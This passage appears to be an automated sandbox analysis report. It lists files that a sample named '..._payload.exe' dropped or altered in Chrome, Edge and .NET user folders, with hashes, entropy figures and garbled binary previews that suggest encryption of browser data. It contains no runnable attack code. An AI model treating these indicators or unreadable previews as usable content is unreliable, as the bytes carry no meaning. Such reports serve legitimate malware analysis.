                                                                                                                          SHA-512:D8D952A2BEE38A8799137DD6EE189EB2B54240F3419ACC04C90EA1ECB48614997EBE68070D5C85667DB0139E1844B510839873F79E4C1227A845190B0A2468F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:{.. z...X3S.....V...w.F<.A?A........6A..l1.L.E.`%..uJ.e.....K}...X.y..3V.&.>..;....#...2.9.6.^r..>P:.P.{.BT5hN.k.6...mO.Y^..l...E.|.<....mp....h....{.^1.~{....6($1.u.?........<.....R186..q.Ejz.n`/m..H......Z..(....i(..>.......?..[..2..>.fuP......;...%{h.N_C..=..KN.H.4....-.W1F...5.2*Z[.^...r..*...T..b...RT.0=DMZ?m.0...50V..Y...&..t@..."....{.e.4.1.=t....E..ni../Y.....Qqtf8P..r.9.t......Oo.i...K..."...q....P..W.%.Y....d..aI.32...y^.1......Hi4.C.X.|..U.....$....GI.G.....P....3..] .S...0\|....e...ax....+.N....+;.j.A...7M).....1...*..$..,".**q.....7..X.n[.:}...........m5r.N+..*...U0?G.gg@H.Z.M..].&.H0pv.$.*.o6ay.qoT.e....[Y"..f.v.lj..........).}R'".$"_U....k..o..2.e.X..4...z1....7V.pX.DH..W....wW..!....?.O._m8<z.d;.SUE....P..].(W......#...N~.....M....._...3..%{.S=.k.\.....L.^...p.Jq|..w..FY...gZy.M....`JphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW\messages.json

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):968
                                                                                                                          Entropy (8bit):7.773252580976319
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:I/9BuU5v5zgvX/7XS6RkisFwuuc319fQFS6xagMbD:I/9BH5v5zES6i5WU19fGMhD
                                                                                                                          MD5:722385B51651E5E873083A8EE410B4DA
                                                                                                                          SHA1:BF7E1777B4810B563BF6491D7534989BCDCC4BCF
                                                                                                                          SHA-256:0D8DF30EBF98E41DC6CC4B87010FE111B941AC85C6AE8CB6F410B4DD597970E7
                                                                                                                          SHA-512:8E9957C7A5F45998400E041C5AC9890399FA6274F9748302F00A6CF8C5D6DC767AC15B0C7C01AD3BD3B18AE75D287FA2C8FD688D18DFF988C80D639B199CFB5C
                                                                                                                          Malicious:false
                                                                                                                          Preview:{.. .....l...u.;.....\=..Oe.y.s$XNt......k.5.q}......on...*.!..."....5.{P..f....a]....).j..NY..'.....,,.'.<Im... ..f....\...1...,...l..<...NQV..;!.BC.k.O..A.i.....Xc.;..x....kh......"...6.iS.....5.F....l.7gg..%.%7]2.{...`..u..q6...1.+s.vY....f....0.En&..:H.g.fk..F..;+..5o?.^%:.|.?.!_..%.8[......:Me=<Z.iS].......3......%Y..vEVayA.-(....i....?}#.F!...S..../K99........|)..."...J..L..........t....s..;.[av.9.v.A........=X,. ...|.j.F.).........2........Z.#.u....:..3LMH.e.Jk.y;...mJ.7`..[%.s.TB.....7U...,....S.6.v...>G*..J.e%.{..8];1.s....X.....E.F..(l..'...)...XU....)......+..T.!`.3.....T1.<..G....\{..>3..........p..fJ..o.3m......+)....u<v....."..c.<.&..v.1.........},..k.a...4TK.Ll<K.A.|..tL..\..^./..TR....,?..GN....o...J.A...UO.....8.0.Xh..0\.U....[~.3./<. ....I..q........WVj.3..ta.....3_.....^.P.....t..NQ....D.8...@........2....)=.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2713
                                                                                                                          Entropy (8bit):7.9192057574228505
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:RDUArvXx3r6vHq9iTtuQlRFjVAcI3Qtvxwa8u2y9aoOKEouNZReVYwU9D:tUUZr6vHGmtuQlzBGgt5/8u3bEoiRofs
                                                                                                                          MD5:CC54E5A5779CADCDB2303F3A8E62D5D7
                                                                                                                          SHA1:5F236B2361EF280D375E40CFCC201B8835471EFD
                                                                                                                          SHA-256:B18844A29EA3B713B8900E2E34ED0AA0FC71DB7CAE1AD9394741176B4843F078
                                                                                                                          SHA-512:1D65176A708787337B45F468B210FB15CD51EE7103BB252F0D26E1C643C45009116C14A95E3EA533AA0D4D1854D4C3379328B3DB769EA057294262DBA4E76B9D
                                                                                                                          Malicious:false
                                                                                                                          Preview:*...#..U.R[..(.g."....;o.~..G...<jZ2^.."n Vwi.d.B.V...*.!|E..H.......=.VVl..F^...A]$..q..).P:d.._.R.q.3."Tk...... T.7..)P....P%.T_Wd"~r.r......|...........E$M.Xp;.%.G=A.....OAq..Em.A..<1V[.Ah...p..P....W%......m.L.u..:).4.P..`l(...Q..y]U.e.U. ....aD?..N...A}h....Z.....8..%Y.g.........D.TV!.e.C..p.(>.CA(...X.TA.n.}.!......\...0...0d....=...}*.I.M.dTR..`.L.fx......@.C..N.fL(...3.p2.q..g..b......d...3..S.]/...K2...P}.C.|<..f.s.^..k....U.....v....q....Mc.Ah.......x].....+.j2u..~....1..../Z|..x.g*.{.G..}.f..T2>,=9.C...$.(.o..f...YflW. w9t..D|0..ZN..{iJ.."...|..t.Es..w....T.c..n{.....Z.x..C....S......._o....,4@...].....k.XE.."...$$..M....g.._B.,.n<Ub.<.U......%..mGL.M.t..2.E....$.....u......0q..f_:4.@..Z.C..8....>.$....)ao.....O...f.-C...~:&e.u.G$y..=.. ...V.`*lo}.}g.:.....^&/..;......<U5M...]..?.^..2c!..L.Uld2[] .'_.>..$S.W.....U.M.!..Gr..R..B....n.>...7.H@r..l.#....>F.Ez....=y..4j.V?.t7.&.Y.X......C..}.....9..>......52..I*a.e|.WL...u..h.}...?..........A

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):654
                                                                                                                          Entropy (8bit):7.633710070358824
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:k5UhC/pLT2ba5ZM5C1UOEKgWnyyF00jTGe2wjKgDJ+nNiJhoZ2hTLq5bTcii9a:/Y5TOaw5UrEH0l0wTGe2CdjQKT+bD
                                                                                                                          MD5:6526E785166C5518C993E28687B36774
                                                                                                                          SHA1:19BB612720A1C5196B2448F1C9BB914209CDFEDC
                                                                                                                          SHA-256:E1243A9A157C13DF0513DFA8C052476A5CB02F512061DFB288F2194D55CD5D7A
                                                                                                                          SHA-512:878241FE963C7335D5D79B57FDE28F04DF37CD424A44E3C95A6E304FDD807B5A79F83666CAE1017321AEF9D0444E9E0C4569EB3036890E1AE8E3B11331C0DEFD
                                                                                                                          Malicious:false
                                                                                                                          Preview:2023/.=.K.......B\....?.. ....}..I.n....biq.k._g.U.W/.o$...\bD..d!b`...p/..bL~lNo.%.N<..Y.......kc'......}l{.....WWu.R......,\I.+..M.V.!..[f|)....E.HU.p..=oT. .c?q.........C .7.\..&$.T."....?....E......94...t.$b..8.\..h..Y...........5"..s(1H.._5Xy.o.e..?.[>D...H..M...F./..j.Y..U.b.ci?K.b....Py..%..W......L.Bd..A.d...M.6....9......*dI....x$..;6...Z..c....u.z...\!.d<N{ub.,..8.....iAw..`..Q.C.T.sic^f..f.O...0.r.L.Ph..(;.g..wkg.;S.......8.......F...w@o..%X$..g.m.".C..W.gV...hrb=s.q.i...x....B.....5.o..l..r..@..tk.y.N..O.I.<qt..x.`..Xsi.[...:OphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):446
                                                                                                                          Entropy (8bit):7.473620803795626
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:/rIC1QcUy3Y22+g5tnFuOaxBM9WfDTCE/2Bq5bTcii9a:4d7ngBM9KlPbD
                                                                                                                          MD5:FE2A3CE84798DC0430C2D6F8D549F757
                                                                                                                          SHA1:6C50F2726DC798FA38DE1A015C9CD4E70623F15B
                                                                                                                          SHA-256:B8C3B5EA394773519EB11C36F18D047459D960E9177D8FA997110C004FB91763
                                                                                                                          SHA-512:85121634BD0547A94DBDC33F70E7EDA9CA5B4A2DC9ABB23AFB15F59C1EA1449B49B538EA93F5D6B419431F2A9F887BD51AD92032621EA182069B2D6CE184D795
                                                                                                                          Malicious:false
                                                                                                                          Preview:.On.!G\.@S.TxC..#.i>..}..T9t:_...qLx...o....2...o.9.M../q,@...c..*d.....{...=...EC..P.R..4z..\.p....F..K.&K.Se..OU.G...m.E.K..M.x.....`...../......<..5...+.%/..9.%.jF.....)p.Zej....H...Q......-u..w..A...S.....i!h9.YJK.1z=$.G.Z.(...|._^/?z..aNV...d...e).[..qb...b].....S.gs...._.5...a...n?...pV..Y.~2o....2.x.)n..`..K.zDJa.@.=..i.GL.I.K.U../..9.s...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):682
                                                                                                                          Entropy (8bit):7.677246636574403
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:kqJJ65wWFNMVvxlUw7ZfaDfF07CKYPYo4MDwsqP6mbhmNzq5bTcii9a:tywW3Avl9aj5KYPcInQ6m1mwbD
                                                                                                                          MD5:85DE3F79CEF2D47FE15541BC65FF6343
                                                                                                                          SHA1:DAD14E43FB147680FBA459C0BC93B4E4EE873690
                                                                                                                          SHA-256:0B0DF46FC474B01404FA9DC2B20FC7EF378CC2D16A41DD33EB04A5C0E967A694
                                                                                                                          SHA-512:5C8DE43250403D372C8E950B0013B328979ED20852D270FF52AF8C274273E29F515AC4873C2D4AA83CA4E0895EB7589896E7DAD73141FF6C32DA802DD215404C
                                                                                                                          Malicious:false
                                                                                                                          Preview:2023/T<.cm..+".{...*n.H.'.da.....n...z.T~.DF.Z..i6.i....".e.=.,.Q.g.g...*oy..F/_ *.I...q...w.C..`.jU.....~...5..].6.....:.~e.5........C..+0a.5~.......w..^.h..O..*|..D...0>.'..`..W.:>D.,..!.M...Qa.J.%.V.....h....Y....p..V..B.;...?.._....z...T..:.3.....4.p......{'.F..{.HW.x.w4..b..P.b.v\K.....16H.:.....!Eo.........x..k...;GT.5..u.0k....>*.$_.2....2..lHd8b...pG.D....k2.@h...:....1.y,..L....6...2....,.v*6..7{.(.$..~.b/tF......M(..3!jI...nM.^|.:',.Q.8+.W.Y.De.oA.g......(..r....G....o.E.q.....?...S;hB..K..8*3B...E.t..{..X.U....f).....t.%.$..).......4...>IQ`..i...Ll....RM......(phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):395
                                                                                                                          Entropy (8bit):7.33554552160718
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:SFu16IjJvWKbR12U1vNFGOLONvLq5bTcii9a:Wu16Eo0w+vNFGOLONv+bD
                                                                                                                          MD5:3B8A81CE2FB0B331CAFC9B92C99E1234
                                                                                                                          SHA1:978571873C0357E185537616DB3283210EC5E9D0
                                                                                                                          SHA-256:E08B2C4832ED29F90D90A90EDBBD5F4A99A0E7D643ADE9F356ED65EA370A3587
                                                                                                                          SHA-512:071AFF6D42DC81E95CA57EBD78BEB974FC726B2697EECF385990FCD1E1C607CF0312BBADFB0A7C14213555919879D57922712C64E1C2904F9F1C2F488547A0BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:*...#...GY...&E1.4...R.~ .._.tW.......0.QN..O....8s7~\RH..V.u!..F..Y.K.~.:t..4....#.>N......X...b...j...41.,}.o......V\..K=w:....i.9.~...].i...8......6.....n.A.....@..w....M.q"g...........;A)...P...s[...)..~q.CG.e.-.C~*.....VI.kC..y.&...T....).g..6...........a.:...J7,.kS.(6.Q.+-....S..g...?....O.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):29006
                                                                                                                          Entropy (8bit):7.993932333194678
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:SqHkriZfY62bWBEUbIkuW0lFQnbFsEI9Fwk4O1Pg9f823VB:Tk21LFBqW0lGnuPWICFB
                                                                                                                          MD5:2516971E7B6DB932B27B2A306ECC81E9
                                                                                                                          SHA1:B5C5EEB910129AA3BEE949EFBDBABE82DBDE7563
                                                                                                                          SHA-256:C2AC9F58974FF1822DEBB1DE6169B3B0A187A2A24A8FDFF8495EE8C2A1549833
                                                                                                                          SHA-512:9C91F192B6C25194B75B4B373A5BBF0218D25C900F347CEC9CC34C7CE4AD74B7209A10D33F96924B5846F0DCBD9B34697E1A675DB427B167B3A532C7E416221F
                                                                                                                          Malicious:true
                                                                                                                          Preview:SQLit.~......o..r...(..|..a..(.>....4QQiC...u.....wT.....tnk............o.@.bU...y...D.K$.......%T.~...nn...7K.-f2A.k.1..-.[I....`<KX..o.........hF....N.{...lg.5.Y..j._........v.kR.....[.... ..Q..D...H.:.Ltx.sf...:...6Y...+.l.8..U=...$...8..X....4.O4...n....,l9gY.l.`../..v.Om.e...g.cw.VSA..v..>J.T..]p.\...k..H7..>]b(<K.t.L.m.T..f0.xy.4:.(.n.bw..<X7.d.WG_.....j..J...#.....'.1~@gNh.N..[..4].j.=[.}@...[5.L...r].N...D.B._F.)F..Ny}......W..7..\.N...R.IX.(...d.C..}.A.[..5.v4...h!...(..s.G...Z^.."..oy..W..m...5M.......l7.'....p#...@..O.og.D.`..B....Sl.>8.<...,_.......r;.....T.=a{...`!5.{J.i...)...Y.L]...{...?._....c4.}?>.%.0+....^.PA.:_....*.uV....;*A.BjPMw....i;....f..... ..C..i......@xvVk....,.GXI...\....~....p$.m.R..up.0.|.....6._5.v..K~CNd..y}K ..._.d.i~...j.$.m.dc.7W.%......(g6|.........\.r....{....p.k........n..;|:.]..I.0G...Ef...]...+.gd.G;.x.9..~....]2.....|o9..........S.C......2_.o....!.A..*......!x.V.D..Cq...D:..k.B.,..2.$..xa...3J.nf.k.

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):77068
                                                                                                                          Entropy (8bit):7.997555288071311
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:zG0iJqbNp43Hk1jEp3EX+l5TJEvXJrBSJX/NNx/gWUae6Tp:zjpcknOPTJMx8P7xIXaeyp
                                                                                                                          MD5:4BA017D2015183AD3072D33BE0E9108A
                                                                                                                          SHA1:1A7C0E0A5D987A052C060BDC51D68F4BDF32552B
                                                                                                                          SHA-256:0E2146E7C79FF0B175764B17998AF75D35259F09227D689A6B4862E353F6FEDE
                                                                                                                          SHA-512:CAAF5F58713395B964BCEAE2C86B9E8B02AD75966DE639B9B627545E0811FF9AB651B37B58E37CB9AB51D560E683244076D6B9312D8D719BB5193F2CEE52656F
                                                                                                                          Malicious:true
                                                                                                                          Preview:A..r. ...0....f./[.m......4..xP8.....:.~<u....&/.......XD)gw2R@| .B...../.V...T..W.....WK...c..f.J...fX)\.A3u....&..h'.Uf1jUT..A...X..[P.R:.M.....y.o.0.l.....2.E..$.7...11,T.2..U.M..."&.@S|....u.c..W.O...Z..*.7?..og)wv......9.....{..i...Z%.-.o.r.h..F|...?+.4.R......L. P..<FGV;.uR....IAD.hbm..n'pV....N.%.vGB..Y.P..~..V..'...X....e.D.H.R..&.....G..4%B..I/.]..6...2......P..f..;...Dg.'E}..{..){.....s.{Fp`K7)...2.....AYj...w*..o...K&oT...\.\.E..'8.4.u......m..79...5T7.!;.\~..7..(w...1.....O.0...J.w..9+.uE[dq.....o..F..Xj[sd.M..~..W.hB.,.f....T.O.o&~HS.#.."...)O.K.._~6.........}.D*.V\.....8.O..9_N.Q..v".....^[l.E.Mq.sR.;y.A.8L....]{..=...P.J]-.y......)l.k.+..*.J.....o....o..P_.U.N_..y.8nG4f#.u%...{B...7.~qo....bE.. .r.7.m..)...-J.y......l........*..\|...].t...e_..I..v.:+.k...'..)5.....cAI.c.$.....%.={..?.|#$U.A.An..3....JC......=.Z.}Q.......<....F..lS..O;. jT..)...*.\....Fy.0.......v/t./......Sm..f..og...eX.4c.p.......L...Y9...g..C

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.old

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):654
                                                                                                                          Entropy (8bit):7.620589041016191
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:kX7EHFjy7afNcKQBtKrMPvm0Zw0igBM4+mCPGVEc/u8qeBFdjPLq5bTcii9a:m7EHq+ccQXm0ZfXBl+mzVEcGlepP+bD
                                                                                                                          MD5:695D480CFF188593BE7FBB67581C81FA
                                                                                                                          SHA1:354EF40DC5126C39BB7A76A7A5D70294E09F02B7
                                                                                                                          SHA-256:D08A1735344049137B0651D90DB0E24F4B6FA8CB6801E3E97BC8927BD0249639
                                                                                                                          SHA-512:967081B99C9B9046A43AE02FA616085198E96D0319BA788230F4CA61E4A766151DB2AF592EA1D06EC5798E1CE3DD64DA53BD811D0046654B0980D6684DACDF68
                                                                                                                          Malicious:false
                                                                                                                          Preview:2023/.../.e.O..........Z.-.9....=.4.....~.!M....5..M.>...,w..7..+\.)..;.K..7...Z..xF.{Z..s5."....~.....~...[.......rx.E=.....<}!......ZAjL..............l.b..a..7..Q......s4...>F.....2.7..[..Z&....Z.C....KK `=.q.. ..Q..Y\x..-,z.+a.UU....u0.7..=........iiO...0y.H.x...0b2]{J...L.g...7,xS;..t.)4N.m..\."V..;D|O#.V...#..Jr..e................H.........V.WL..8!..f.b..p..A.XO.F....Vk"..j._..............Y&. ...!l...e.^4P{.\........~0&....5Te..P...2P.w>@..........U.wR.C. .qE3.C.S.k5X.....oR.2.}Q.YL..|.N#.duk....5...Cc..W..Q..A..G.8=.. ~.....6.....J.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49486
                                                                                                                          Entropy (8bit):7.996581114686016
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:B7WoSzcMUZ5eri0GZi9ndtYoAEE9axflT2/MIVEE3coAQ3I1gvQt:FWoSXUIiRqndtxAEE9a/HEsoAQ3Iyv2
                                                                                                                          MD5:4EA2D9425ED008500C5AD8056BE8A727
                                                                                                                          SHA1:404C27A8F5285CDC20834F919B8E9D5026A9C984
                                                                                                                          SHA-256:975DB2B8155910005EEEC63A79B25461DAF8AA2F40A16CEDA43235816BC85A27
                                                                                                                          SHA-512:252F919F32846477DF1FE8120723D33F054C53EF7A2CD1EBB6AA415F7864A403FD31BA1F42F39D74E6DB7AFC11508564A83E39E7828073F0E5A00976E98DD16C
                                                                                                                          Malicious:true
                                                                                                                          Preview:SQLit.|.(...."`..?O...kKv..........1""r..O..r....=.'.[.2..S....2.l....d...P.h.....`...s....$.R.V9s.&=$W./.6........ot.q.e.F/.5?Cm.......~.?P..d.. ....;.sY..se...xy..U"....T....8....|...8.XS.`:.....h......L+<...........7q....9...85.K.H4\.m..SU.Q.0.....s..........n..tR<7y.5..1T..M..]o0X....B'....`.2#[krb...>.k...U.......P@.;..0..>.JP........SA.).D...G.Wgy....l.X;x@A.hU./?+A.v.d...XX...7..S..Y.tD.\...........]../.>.Q.o.....mx.7..H.6...V.B.M.)RQ...:..d.9.....HH..P@..(^.I.....Pr..%/...<..~........o.h[f.G.....'....C#.v)!4.,...........;m.c...v:...ln........._.,..........|..1EQ..l......E.FN..O.Z..4N].j.i..m..gD../K.U.,!.RB/........<.........H..?.fV.."f.m....... O.E.x.l..5.3{...G....j..(9.i.@.a0y..c#,fLB..]m.o.{],.'...O...n...E..aQ...#...l.V...6.....{_P..g..m..4...?Bm.H...q0.NI...._a........m.h..2k..-n.....z.....@....#..e.....4.....p...].A.M 0|<g#b..b... .t...u.........+........N..l..>...9..J...Ln..T.0K...:...)...4.0...,C....L.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):354
                                                                                                                          Entropy (8bit):7.196188461424796
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:QVgWzNW9I145KPtdOPzWMDlVnyX9g6fC8iaEZ0UbF7/N6W/xqbJq5PDTcii96Z:QVgZ1AtdyzHyX/5h41EW/xeq5bTcii9a
                                                                                                                          MD5:D17902E65BAE74DD00E7199CC410D700
                                                                                                                          SHA1:AFB0FB6FE62BA792AFFFFC5333C8C63BD68C9ECD
                                                                                                                          SHA-256:92E3B083CB922C74FCF349FE7D76477324833821EB1BA250706B5785148ADA10
                                                                                                                          SHA-512:7F724936D58512B56758DD4354B5C53903C70855194B6D38E9534D530278BEE6B24F1E6893F3C525E5538B92FB95284AF03AD7AAFFBCEC4090D64FFE48813030
                                                                                                                          Malicious:false
                                                                                                                          Preview:1,"fu....!.......ux/.cuH3...B.=........o.,...r.Z....<*[....pd.d.T.l!.. .!![.5.w3l+...c..%.I.......K.p..~.:...(......A*.3o..?.F...............tC.....?....p1.z.........]..k........^....S.;!'...8...{..{5....f.0..F.d+Ah.y.....o.....l,..w.].<.t..>G/s....w..I.~..IwiU.F..[7phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\InspectorOfficeGadget.exe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1210
                                                                                                                          Entropy (8bit):7.817544821949396
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:SVGVh6DtISnYf5RoQUqDyThcVa+Zg+vzI3RN0zd0g6+bD:8GH6DtI8YDoQUqD5ZggMN9g3D
                                                                                                                          MD5:0FF051511693FB4D52D72EC807305F91
                                                                                                                          SHA1:569FC3FF3CFDEDDE42398600E96F8D2843EE6493
                                                                                                                          SHA-256:D3146F2B4CF6346ABE12CAE09DAE5B7978ACD2D4BA3D3B6E44826A4F0BD05358
                                                                                                                          SHA-512:AC356507B48139178065656E8F3980E4320D4BC2A30BD67D9071EC9D2BDDBA3A9179BF980C69B44D02954F315CEFD5BB238E3F5E587770F734CFBD926A0F2F91
                                                                                                                          Malicious:false
                                                                                                                          Preview:1,"fu..7A.h..w..&<....q.....\..u.Y.>..1.p....a..{.0..Y.......T/.?....5%*.()W%.pj..^...ji.:.......5V.......{)H...GVh....D...^.W.....&?M;.7..L.~.U.........9..d.....4..........`B.....]. .e73s*[7y... ..z....]m..).7..4....>....g.sq..........%...]5....J....o......w.R..G.f.>%..DF.....,./".].....{.G.........:.r;e.J...\.l....>.|........9Og-wsqb.j.1c.....y.>...%Y..2$2.U*..+...o....k......8.......q.......w.oOJ.:.(.?.&.t%X.. ....[..W..../I...`...j..e..-Hk...$.. a.-.N.eC m..#.RN.........^=....;OZ.$e'.L.?...>8.....L...^^.6..=..n.M.G.ffc4.6WG..9....R...........-.]......l..KE.u...c(%..*.....R{$V......d..p.4.+..LT...1.mr...J.Y....n...Z.qc/.(....?.^.[f.^W.Z.W.kC..;...d.j~......b..*.kF..\-<..b.............=.....E...aE....g7..5.&....#+....E..3.z.....0....B6T.r....t.3nN.>.h.o..a..n...a....Hk......qa...b..)..P.5.@...-(.T....\.U...E.......Y..;.m1.N..)p{...b.!......)I..4D.>.0z.".!b_#.(...H....U...._..,.Do...^.m.:4'}_..P..`5..}.......4Q0&..H.M...M.. {..$..a.h.'0..G(...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16718
                                                                                                                          Entropy (8bit):7.990740001662978
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:384:bWaBH7rmQQ9Q54VCoczEoAm2eiGipkC0+xd5lTVHO4bf6X4WmKngL:bWaBH7rJQ9ctoPtVzP5HO6656
                                                                                                                          MD5:B896181F8F57E847288D350165483B7B
                                                                                                                          SHA1:3202B0056149B44836EC2F296994F6D62EC8B951
                                                                                                                          SHA-256:4FC04646BE9968185E5F7914FC98EAF4A1F53E65199075D2BFADA1318F3AD818
                                                                                                                          SHA-512:65298F9FBA711E8937EAB5B8242D8931D5C1F0406E13CF427A25B8B11DFFB204F6E90F39EDD0A7FA64C0AF620453DD93549E636F2086DA258D4A1B192D5902B0
                                                                                                                          Malicious:true
                                                                                                                          Preview:...@.w.p....`..IR.....p.0.G#..=.oQ...L.`........nY...o.5...7....c.U.k.l.t...SQ.....IZV..V.A.>.5.*.([..\)P........2L#$.u.e.tcTW17"...u......Q..YU....9..[...N(j.....d.....0..ZB7...}....L.J.z....h..<...~aB.Q..#.T..yO..&3.f...3......g....0?W...X.N:PM.....L|f.r....(..l..p.N.T.z_...,7S.@.mv...2D.K...r.G.v.{L..h..Jj......T!..,....M..D... .t.. !\.RRx..Z.Bh.M...7....._.o..J...H..D.|..!.}8R.)...xY*.v..c...uL...;t-.~...t..;~.TNCL...Tu..B!..`-.x,.~.=P.M{..$..,.x...Wv..f..A.....z4....@....rj>D{*B..@B.(.:e.....y...[..1!.k\.ld."A.$.t.....L3...D....$..ee..1.....$Z.A^#.X.j..\..LB...G?2g.R...Gt..4..A.^t(x..../....W9f..^.....I&..%.^.....v.v/......h6.....\....%T.j..Rq..S...r.dZ.4.9......A..^.....o...'.P..v.}.B..G.&.LU{5..A=...s.._f2.$..`...c...{K...=.C.Y.f.g.......6.S.!.$<W.]Yl..j.P...U.El.gy;2..<.1.k..0.....!bkM...K. .......3.Q..+.[.,.VYQu.e.bt.yT.5 ...d|...l.DM..5.X.s...N.KM.....=..Y....7.TxC%..........g...5..lvz..23k5...r.?P.g..j....f_..c...^iL{..`.R...Td......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                          Download File
